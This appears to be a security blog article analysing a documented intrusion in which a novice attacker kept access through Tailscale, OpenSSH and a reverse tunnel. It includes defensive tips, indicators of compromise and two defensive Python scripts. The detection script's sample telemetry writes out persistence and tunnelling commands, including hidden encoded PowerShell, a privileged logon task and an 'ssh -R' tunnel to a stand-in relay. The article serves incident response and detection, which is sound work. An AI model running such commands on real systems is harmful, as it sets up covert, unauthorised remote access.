Access That Survives Its Own Takedown: The Operation Poisson Lesson
One of the most deeply held beliefs in incident response is that if you find and disconnect the server an attacker is using to control a compromised network, you’ve kicked them out. A recent case, documented in detail by security firm Cato Networks, shows that belief is no longer enough. An attacker with little experience — whom researchers nicknamed “Poisson” — compromised the network of a small French automotive company and, before losing control of his infrastructure, set up a way back in using two perfectly legitimate, everyday tools: Tailscale and OpenSSH. When his main server went down, his access stayed alive for 18 days.
The most revealing part of this case isn’t sophistication — the operator was a beginner who failed at nearly half of what he attempted — it’s how accessible a persistence technique once associated with advanced groups has become today.
Attack timeline
| Date | Milestone | Detail |
|---|---|---|
| MAR 30 (Day 1) | Initial intrusion · automotive SMB | Compromised in 83 minutes. Escalates to admin, creates a scheduled task, and installs RustDesk as a backup channel. Malware that runs in memory, barely touching the disk. |
| MAR 31 (Day 2-3) | Persistence and credential theft | Injects code into system processes. On one victim, a user accepts the elevation prompt after a dozen attempts and admin access is obtained. Deploys a keylogger. |
| APR 7 (Day 8) ⭐ | Installs Tailscale + OpenSSH | The key move. Joins the victim’s machine to his encrypted private network. Sets up SSH access and a reverse tunnel. Now he can get in without going through his C2 server. |
| APR 8 (Day 9) | The C2 server goes down | ✗ The main infrastructure goes offline. ✓ But the Tailscale access lives on a separate network. |
| 18 days without C2 | Access stays active, quietly | |
| APR 26 | The C2 comes back and the agents reconnect on their own | No need to attack anything again: the scheduled tasks, the SSH server, and the VPN mesh had been running for weeks. |
| APR 30 | Goes after higher-value credentials | Explores certificates and smart cards, and runs two programs from a mysterious file called Thales.zip. |
| MAY 1 | Deletes 17 files and disappears | The C2 shuts down for good and hasn’t returned. |
What happened?
Between March 30 and May 1, 2026, the operator nicknamed “Poisson” ran a credential-theft campaign against a small French automotive company and several private individuals in the country. The Cato CTRL research team at Cato Networks was able to reconstruct the entire operation — 339 commands over 33 days — thanks to a slip-up by the attacker himself: he left his access keys and a step-by-step instruction manual on an open cloud storage service, accessible to anyone. That turned the case into something unusual: an intrusion observed practically “over the attacker’s shoulder,” rather than reconstructed months later from the leftover traces of an attack.
Initial access relied on a chain of malicious programs designed to run in the machine’s memory, avoiding files on the hard drive that antivirus software could easily flag. Once inside, the attacker secured his presence using standard methods: a scheduled task that re-triggered at every login, and a remote desktop tool (RustDesk) as a backup channel. To steal information, he deployed a keylogger — a small program that records everything the victim types, passwords included, into a file. Curiously, he didn’t even automate the theft: he’d connect periodically and collect the file by hand. Up to this point, just another intrusion.
The turning point came on April 7. In an overnight session lasting about five hours, the attacker installed two tools on the victim’s machine that no antivirus flags as dangerous, because they aren’t: OpenSSH, the standard for secure remote connections present on practically every system in the world, and Tailscale, a popular mesh VPN service (built on WireGuard) that businesses and individuals use daily to connect devices securely. With these, the attacker joined the compromised machine to his own private network and set up SSH access with a reverse tunnel. The result: a direct, encrypted line into the machine, with no inbound port exposed to the internet, and completely independent of his Command and Control (C2) server.
The payoff from that move showed up a day later. On April 8, the attacker’s main infrastructure — his C2 server — went offline. In a textbook scenario, that would have meant the end of his access. But because the Tailscale pathway ran on a completely separate network, the access survived. When the C2 server came back online on April 26, 18 days later, the programs installed on the victims’ machines reconnected on their own, with no need for the attacker to re-compromise anything.
Technical anatomy: the seven stages of the attack chain
The chain reconstructed by Cato consists of seven stages. It’s worth walking through them, because together they form a modern, comprehensive playbook for evasion.
- `sys.vbs`, the stager. [Evasion] A 1.1 KB VBScript. It sleeps for 120 seconds to outlast automated analysis sandboxes, then AES-decrypts an embedded PowerShell payload, with the `Invoke-Expression` string split to evade static detection.
- `senti.dll`, the matryoshka doll. [Fileless payload] A 3.1 MB .NET DLL that encodes shellcode as 207,813 English words. Inside, a Donut-style reflective loader wraps the Demon agent from the Havoc framework. Five layers of nesting; the final implant, barely 50 KB, never touches disk.
- The UAC “bypass” that wasn’t a bypass. [Privileges] The elevation kicked off with `Start-Process -Verb RunAs`, which isn’t silent: it triggers the Windows consent dialog. On Victim 3 it took a dozen attempts before the user accepted it.
- Redundant persistence. [Persistence] A scheduled task called `TaskAdmin1` that runs at every login with highest privileges, a shortcut in the Startup folder, and shellcode injected into `Explorer.EXE`. Three overlapping mechanisms.
- RustDesk. [Secondary channel] A custom-compiled build of this remote desktop tool, configured with the attacker’s own relay. A backup channel independent of Havoc.
- The keylogger. [Theft] A 70-line Python script using `pynput` that logs every keystroke to a local file. No beacon, no exfiltration server: ~3,000 characters per session, collected by hand.
- SSH and Tailscale. [C2-independent persistence] OpenSSH Server and the Tailscale VPN mesh, with key-based authentication and a reverse tunnel. The access layer that survived the C2 takedown.
Analytical takeaway. No single stage here is novel on its own. The value of this case lies in the integration: a fileless, five-layer chain, triply redundant persistence, a theft channel with no network traffic, and a persistence layer built on top of legitimate infrastructure. It’s the operational maturity of the whole that deserves attention.
Blending into the network: “Living off the Land”
Why was an attack carried out by a beginner so effective? The answer lies in a technique known in the security world as “Living off the Land”: instead of bringing in flashy malicious tools that defenses recognize and block, the attacker leans on legitimate, signed, trusted software that’s already part of the normal landscape of any corporate network.
Most antivirus software and protection systems work, to a large extent, by identifying known “bad files.” But Tailscale and OpenSSH aren’t bad files: they’re legitimate, widely used programs, digitally signed by their makers. A security system that only looks for known threats has no reason to raise an alarm when it sees them. The traffic they generate, on top of that, travels encrypted, so it blends naturally into a company’s regular communications without raising suspicion.
In other words, the attacker didn’t pick the lock — he used a legitimate copy of the key. His access blended into what any network would consider routine activity. That’s why detection that stops at the level of “this file is malicious” is blind to this kind of maneuver: what’s suspicious isn’t which program is being used, but the context in which it shows up.
The evolution of threats
This case illustrates a deeper shift in the threat landscape that deserves attention. For years, the dominant narrative has centered on the big players: organized ransomware gangs, state-sponsored actors, espionage operations with multi-million-dollar budgets. But the everyday reality for small businesses and individual users — the ones without a dedicated security team — is increasingly shaped by a long tail of low-level operators who, without major resources or expertise, manage to pull off notable results.
“Poisson’s” profile is telling. Everything points to someone still learning: his active hours matched a school schedule (active in the afternoons, with a long midday gap), and he built his entire operation on free services — to the point that one of them ran out of its free download quota mid-attack and locked him out for hours. His carelessness was such that he left his own keys and manuals out in the open for anyone to find.
What matters is how an attacker like this achieves his goals. Rather than developing sophisticated tools, these operators are learning to exploit the trust placed in legitimate platforms and services. The barrier to entry into cybercrime keeps dropping, and the line separating the amateur from the professional blurs when both lean on the same legitimate toolbox.
Security and prevention tips
This incident leaves practical lessons for any organization, regardless of size or whether it has a dedicated security team.
For any user or organization
- Keep track of remote access software. OpenSSH, Tailscale, RustDesk, AnyDesk, and similar tools are legitimate, but they should be inventoried and authorized. If they show up on a machine with no clear reason, investigate.
- Be wary of unexpected permission prompts. The attacker only got elevated privileges because someone clicked “Yes” on a window they weren’t expecting. If you didn’t trigger the action yourself, deny it.
- Turn on two-factor authentication (2FA). The target was passwords captured by a keylogger. A second factor means a stolen password alone isn’t enough. Prefer phishing-resistant factors such as FIDO2 security keys or passkeys: a one-time code typed on a keylogged machine can be captured just like the password.
- Don’t rely on traditional antivirus alone. Solutions that only look for “bad files” won’t catch the abuse of legitimate software or in-memory chains. Pair them with behavioral monitoring.
For administrators and IT teams
- Treat an OpenSSH server (`sshd`) installed on Windows desktop machines as a high-risk signal. The OpenSSH client ships with Windows by default, but the Server is an optional capability that is rarely legitimate outside of servers, and it was key to persistence in this case.
- Watch for Tailscale showing up, or any mesh VPN, on machines with no operational reason to be running it.
- Apply the principle of least privilege. The fewer users with admin rights, the harder it is for an attacker to gain a foothold.
- Periodically review scheduled tasks, auto-start services, and privileged accounts.
- Block free dynamic DNS services (DuckDNS, No-IP) at the organization’s resolver unless there’s a justified business need.
For security teams and SOCs
- Detect reverse SSH tunnels (`ssh -R`) from internal machines to external servers.
- Alert on `wscript.exe` running `.vbs` files from user temp folders.
- Monitor changes to power settings (`powercfg`).
- Watch for code injection into legitimate processes (such as `Explorer.EXE`) and hidden PowerShell execution.
- Shift from signature-based detection to behavior-based detection. The final-stage tools are legitimate, signed binaries; no file signature will catch them.
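The point made in the “Living off the Land” section, that what is suspicious is the context rather than the binary, is what the administrator and SOC checklists above boil down to. As an added illustration (example code written for this page, not from Cato’s report or from any of the tools it names), the following Python turns each tip into a rule over process-creation events modelled on Sysmon Event ID 1 / Security 4688 fields. The host names, users, the mesh-VPN allowlist, the `203.0.113.10` relay address and every event are constructed for the example; each rule fires only when a legitimate binary appears in the wrong place, with the wrong arguments, or on a host that has no business running it.

```python
"""Context-based detection for the tradecraft described on this page.

Events mimic process-creation telemetry (Sysmon EID 1 / Security 4688 with
command-line auditing). SAMPLE_EVENTS below are constructed for this example.
"""
import re
from dataclasses import dataclass

# Assumption: hosts that are authorised to run a mesh VPN client (constructed).
AUTHORIZED_MESH_VPN_HOSTS = {"it-jump01"}


@dataclass
class ProcEvent:
    host: str
    role: str      # "workstation" or "server"
    user: str
    image: str     # full path of the executed binary
    cmdline: str


def _exe(ev: ProcEvent) -> str:
    """Lower-cased basename of the image path, so rules ignore install location."""
    return ev.image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def rule_script_host_from_temp(ev: ProcEvent) -> bool:
    """wscript/cscript launching a .vbs out of a user Temp folder (the stager)."""
    cl = ev.cmdline.lower()
    return _exe(ev) in {"wscript.exe", "cscript.exe"} and ".vbs" in cl and "\\temp\\" in cl


def rule_hidden_powershell(ev: ProcEvent) -> bool:
    """PowerShell started with a hidden window or an encoded command."""
    return _exe(ev) in {"powershell.exe", "pwsh.exe"} and re.search(
        r"-w(?:indowstyle)?\s+hidden|-e(?:nc|ncodedcommand)\b", ev.cmdline, re.I) is not None


def rule_logon_task_highest(ev: ProcEvent) -> bool:
    """schtasks creating a logon-triggered task that runs with highest privileges."""
    cl = ev.cmdline.lower()
    return _exe(ev) == "schtasks.exe" and all(f in cl for f in ("/create", "/rl highest", "/sc onlogon"))


def rule_powercfg_change(ev: ProcEvent) -> bool:
    """Power-plan changes, typically used to keep a victim machine from sleeping."""
    cl = ev.cmdline.lower()
    return _exe(ev) == "powercfg.exe" and any(
        f in cl for f in ("/change", "-change", "/x ", "/setacvalueindex", "/setdcvalueindex"))


def rule_sshd_on_workstation(ev: ProcEvent) -> bool:
    """OpenSSH *Server* installed, enabled or running on a desktop (the client ships by default)."""
    cl = ev.cmdline.lower()
    return ev.role == "workstation" and (
        _exe(ev) == "sshd.exe" or "openssh.server" in cl
        or re.search(r"set-service\s+(?:-name\s+)?sshd\b", cl) is not None)


def rule_reverse_ssh_tunnel(ev: ProcEvent) -> bool:
    """ssh -R from an internal host: a remote-to-local forward, i.e. a reverse tunnel."""
    return _exe(ev) in {"ssh.exe", "ssh"} and any(t.startswith("-R") for t in ev.cmdline.split())


def rule_unauthorized_mesh_vpn(ev: ProcEvent) -> bool:
    """Tailscale client activity on a host nobody authorised for a mesh VPN."""
    return _exe(ev) in {"tailscale.exe", "tailscaled.exe"} and ev.host not in AUTHORIZED_MESH_VPN_HOSTS


RULES = [rule_script_host_from_temp, rule_hidden_powershell, rule_logon_task_highest,
         rule_powercfg_change, rule_sshd_on_workstation, rule_reverse_ssh_tunnel,
         rule_unauthorized_mesh_vpn]


def evaluate(events):
    """One (rule_name, host, cmdline) tuple per rule hit, in event order."""
    return [(r.__name__, ev.host, ev.cmdline) for ev in events for r in RULES if r(ev)]


def fired_rules(events):
    """Names of the rules that fired at least once."""
    return {name for name, _, _ in evaluate(events)}


W = "workstation"
# Constructed telemetry: the first seven rows mimic the intrusion, the rest is benign noise.
SAMPLE_EVENTS = [
    ProcEvent("ws-fr-07", W, "alice", r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\alice\AppData\Local\Temp\sys.vbs"'),
    ProcEvent("ws-fr-07", W, "alice", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    ProcEvent("ws-fr-07", W, "alice", r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /tn TaskAdmin1 /sc onlogon /rl highest /tr "C:\Users\alice\AppData\Local\Temp\run.vbs"'),
    ProcEvent("ws-fr-07", W, "alice", r"C:\Windows\System32\powercfg.exe",
              "powercfg.exe /change standby-timeout-ac 0"),
    ProcEvent("ws-fr-07", W, "alice", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0"),
    ProcEvent("ws-fr-07", W, "alice", r"C:\Program Files\Tailscale\tailscale.exe",
              "tailscale.exe up --authkey tskey-auth-xxxx --accept-routes"),
    ProcEvent("ws-fr-07", W, "alice", r"C:\Windows\System32\OpenSSH\ssh.exe",
              "ssh.exe -N -R 2222:127.0.0.1:22 relay@203.0.113.10"),
    # Benign: the same binaries in their normal context must not fire.
    ProcEvent("it-jump01", "server", "svc-it", r"C:\Program Files\Tailscale\tailscale.exe", "tailscale.exe status"),
    ProcEvent("srv-build", "server", "svc-build", r"C:\Windows\System32\OpenSSH\sshd.exe", "sshd.exe"),
    ProcEvent("ws-fr-07", W, "alice", r"C:\Windows\System32\OpenSSH\ssh.exe", "ssh.exe -p 22 alice@srv-git"),
    ProcEvent("ws-fr-07", W, "alice", r"C:\Windows\System32\wscript.exe", r'wscript.exe "C:\Program Files\Vendor\setup.vbs"'),
]

if __name__ == "__main__":
    for name, host, cl in evaluate(SAMPLE_EVENTS):
        print(f"{host:10} {name:28} {cl}")
```

Run as a script it prints seven hits, all on `ws-fr-07`, and nothing for the four benign rows. The allowlist is what makes the Tailscale rule a context rule rather than a blocklist: the same `tailscale.exe` is silent on the jump host and noisy on a sales workstation, which is exactly the distinction the page argues signature-based tooling cannot draw.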
⚠️ The central lesson for incident response. If you take down the server an attacker is using to control a machine, don’t consider the incident closed. Assume he may have left other ways in, and actively look for remote access services, tunnels, or VPN meshes installed during the intrusion. Shutting down the attacker’s server is one step, not the finish line.
Indicators of Compromise (IOCs)
For anyone who wants to check their own environments, Cato published the technical indicators from the operation. IP addresses and domains are “defanged” (bracketed) to prevent accidental clicks.
Network infrastructure
| Indicator | Description |
|---|---|
| `217[.]154[.]217[.]139` | Havoc C2 server (IONOS, Berlin) |
| `217[.]154[.]162[.]45` | C2 redirector (IONOS, Berlin) |
| `wawsenti[.]duckdns[.]org` | TLS certificate CN for both servers |
| `pois43[.]s3[.]eu-central-003[.]backblazeb2[.]com` | Payload storage |
| `w456w5[.]s3[.]eu-central-003[.]backblazeb2[.]com` | Payload storage |
| `sentiwaw[.]s3[.]eu-central-003[.]backblazeb2[.]com` | SSH manual |
Files · SHA-256 hash
| File | SHA-256 |
|---|---|
| `sys.vbs` | `aa7ea19e34567458b4ee66a7cd274181764984bf32123f756a7fdc64d5857b31` |
| `senti.dll` | `3b7642b0f84e83a36334c608655c6cb7aae774839a6a3488526b853d89830a60` |
| `KeyL.zip` | `1f00fd604bb18bbe3081f9ce8d741c4029d2a2125eb8888ac4e0d955938059d6` |
| `Thal.exe` | `0378a5ef51b008aa2d6b76bd44a0bf061339bc3b737a188ec82029444d4d18fe` |
Additional: RustCustom.zip, SSH.zip, RevS.ps1 (full hashes in Cato’s report).
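An added example of putting these indicators to work (written for this page, not from Cato’s report): the Python below keeps the indicators defanged exactly as published, refangs them only in memory, matches them against DNS and egress log lines, extends the match to any name under the dynamic-DNS zones the page recommends blocking, and checks a file inventory against the published SHA-256 hashes. The log lines, the `ws-fr-07` host, the inventory paths and the benign hash (the SHA-256 of an empty file) are all constructed. One caveat a practitioner should keep in mind: the two IONOS addresses sit on shared cloud hosting and will be reassigned over time, so an IP-only hit is a lead to confirm against the April 2026 timeline, not a verdict.

```python
"""Sweep telemetry for the Operation Poisson indicators published by Cato.

Indicators stay defanged as published and are refanged only in memory. The
log lines and file inventory below are constructed for this example.
"""
import re

NETWORK_IOCS = {
    "217[.]154[.]217[.]139": "Havoc C2 server (IONOS, Berlin)",
    "217[.]154[.]162[.]45": "C2 redirector (IONOS, Berlin)",
    "wawsenti[.]duckdns[.]org": "TLS certificate CN for both servers",
    "pois43[.]s3[.]eu-central-003[.]backblazeb2[.]com": "payload storage",
    "w456w5[.]s3[.]eu-central-003[.]backblazeb2[.]com": "payload storage",
    "sentiwaw[.]s3[.]eu-central-003[.]backblazeb2[.]com": "SSH manual",
}
FILE_IOCS = {  # SHA-256 -> file name from the report
    "aa7ea19e34567458b4ee66a7cd274181764984bf32123f756a7fdc64d5857b31": "sys.vbs",
    "3b7642b0f84e83a36334c608655c6cb7aae774839a6a3488526b853d89830a60": "senti.dll",
    "1f00fd604bb18bbe3081f9ce8d741c4029d2a2125eb8888ac4e0d955938059d6": "KeyL.zip",
    "0378a5ef51b008aa2d6b76bd44a0bf061339bc3b737a188ec82029444d4d18fe": "Thal.exe",
}
# Dynamic-DNS zones the page suggests blocking at the resolver. Matching the whole
# zone, not just wawsenti, also catches a renamed C2 on the same provider.
DYNDNS_ZONES = ("duckdns.org", "no-ip.com", "no-ip.org", "ddns.net", "hopto.org")


def refang(ioc: str) -> str:
    """Turn a bracket-defanged indicator back into a matchable, lower-cased string."""
    return ioc.replace("[.]", ".").replace("hxxp", "http").lower()


REFANGED = {refang(ioc): desc for ioc, desc in NETWORK_IOCS.items()}

# IPv4 literal or dotted host name; enough for DNS, proxy and flow logs.
HOST_RE = re.compile(r"(?i)\b((?:\d{1,3}\.){3}\d{1,3}|(?:[a-z0-9-]+\.)+[a-z]{2,})\b")


def scan_line(line: str):
    """(indicator, reason) pairs for every published IOC or dyn-DNS host in one log line."""
    hits = []
    for host in sorted({h.lower() for h in HOST_RE.findall(line)}):
        if host in REFANGED:
            hits.append((host, REFANGED[host]))
        elif any(host == z or host.endswith("." + z) for z in DYNDNS_ZONES):
            hits.append((host, "dynamic-DNS host (not in the published list)"))
    return hits


def sweep_logs(lines):
    """(line_number, indicator, reason) for every hit across the log lines, in order."""
    return [(n, ioc, why) for n, line in enumerate(lines, 1) for ioc, why in scan_line(line)]


def sweep_hashes(inventory):
    """inventory maps file path -> SHA-256 hex; returns (path, known_name) per matching hash."""
    return [(path, FILE_IOCS[h.lower()]) for path, h in inventory.items() if h.lower() in FILE_IOCS]


# Constructed DNS and egress log lines from a hypothetical workstation.
SAMPLE_LOGS = [
    "2026-04-07T02:13:44Z ws-fr-07 dns query A wawsenti.duckdns.org",
    "2026-04-07T02:13:45Z ws-fr-07 tcp 10.0.4.17:51722 -> 217.154.162.45:443 sni=wawsenti.duckdns.org",
    "2026-04-07T02:20:01Z ws-fr-07 https GET https://sentiwaw.s3.eu-central-003.backblazeb2.com/SSH.zip",
    "2026-04-07T02:21:09Z ws-fr-07 tcp 10.0.4.17:51790 -> 93.184.216.34:443 sni=www.example.com",
    "2026-04-08T09:02:10Z ws-fr-07 dns query A login.microsoftonline.com",
    "2026-04-10T18:40:12Z ws-fr-07 dns query A other-host.duckdns.org",
]
# Constructed file inventory: one published hash and the SHA-256 of an empty file.
SAMPLE_INVENTORY = {
    r"C:\Users\alice\AppData\Local\Temp\sys.vbs":
        "aa7ea19e34567458b4ee66a7cd274181764984bf32123f756a7fdc64d5857b31",
    r"C:\Users\alice\Desktop\notes.txt":
        "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
}

if __name__ == "__main__":
    for n, ioc, why in sweep_logs(SAMPLE_LOGS):
        print(f"line {n}: {ioc} ({why})")
    for path, name in sweep_hashes(SAMPLE_INVENTORY):
        print(f"{path}: matches published hash of {name}")
```

Against the constructed input this reports five network hits (the second line yields both the redirector IP and the DuckDNS name) and one hash match. The last log line is the reason for the zone-wide rule: it is not a published indicator, but a second DuckDNS name on a workstation that never resolved one before is the kind of context the page says deserves a look.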
Traces left on the machine
- Scheduled task `TaskAdmin1`: runs at login with highest privileges.
- `sshd` (auto-start) and Tailscale services.
- Firewall rules `RustDesk Full Access` and `SSH`.
Operator identity
- Aliases `Poisson`, `Stikou68`.
- Linux `avenger@ubuntu`, path `/home/avenger/Desktop/`.
- Storage buckets `pois43`, `w456w5`, `sentiwaw`.
Technical summary
| Field | Detail |
|---|---|
| Case name | Operation Poisson (Cato CTRL / Cato Networks) |
| Attacker | “Poisson” — novice operator, not an advanced group |
| Attack goal | Credential theft (banking, email, government portals) |
| Victims | A French automotive SMB and four private French individuals |
| Legitimate tools used | Tailscale, OpenSSH; RustDesk as backup |
| Initial access | In-memory malware chain (Havoc framework) |
| Data theft | Python keylogger, manual collection, no exfiltration server |
| Persistence type | C2-independent access via Tailscale + SSH with reverse tunnel |
| C2 status | Went down on April 8; access survived; returned on April 26 (18 days later) |
| Total duration | 33 days (March 30 – May 1, 2026); 339 commands logged |
| Notable technique | Living off the Land |
| Main lesson | Shutting down the C2 server doesn’t equal remediating the intrusion |
Wrapping up…
The main takeaway from Operation Poisson is both simple and profound: in cybersecurity today, the most dangerous thing doesn’t always look like a threat. An attacker without much expertise pulled off lasting, quiet access not by overpowering defenses head-on, but by hiding in plain sight, using the same legitimate tools organizations rely on every day.
For businesses and administrators, the preventive lesson is clear: modern protection isn’t just about blocking the obviously malicious — it’s about knowing your own environment inside and out: what software is authorized, what behavior is normal, and what connections make sense, so you can tell legitimate use apart from abuse. And when it’s time to respond to an incident, it’s worth remembering that neutralizing the attacker’s visible tool is just the beginning; real remediation requires making sure he hasn’t left any door half-open.
Sources consulted
Cato Networks. (2026, June 16). Cato CTRL Threat Research: Operation Poisson – Analyzing a Cybercriminal’s Entire Operation. https://www.catonetworks.com/blog/cato-ctrl-operation-poisson-analyzing-a-cybercriminals-entire-operation/
Khandelwal, S. (2026, June 17). Junior Hacker Used Tailscale and OpenSSH to Keep Access After His C2 Went Offline. The Hacker News. https://thehackernews.com/2026/06/junior-hacker-used-tailscale-and.html
SC Staff. (2026, June 18). Attacker establishes persistent access to French business using OpenSSH and Tailscale. SC Media. https://www.scworld.com/brief/attacker-establishes-persistent-access-to-french-business-using-openssh-and-tailscale
Q2BSTUDIO. (2026, June 17). Hacker junior usó Tailscale y OpenSSH para mantener acceso tras caída de su C2. https://www.q2bstudio.com/nuestro-blog/1990627/hacker-junior-tailscale-openssh-acceso-persistente-c2
Mia, A. (2026, June 18). Young hacker used Tailscale and OpenSSH to break into French car manufacturer. SecNews. https://www.secnews.gr/en/715954/hacker-chrisimopoiise-tailscale-openssh/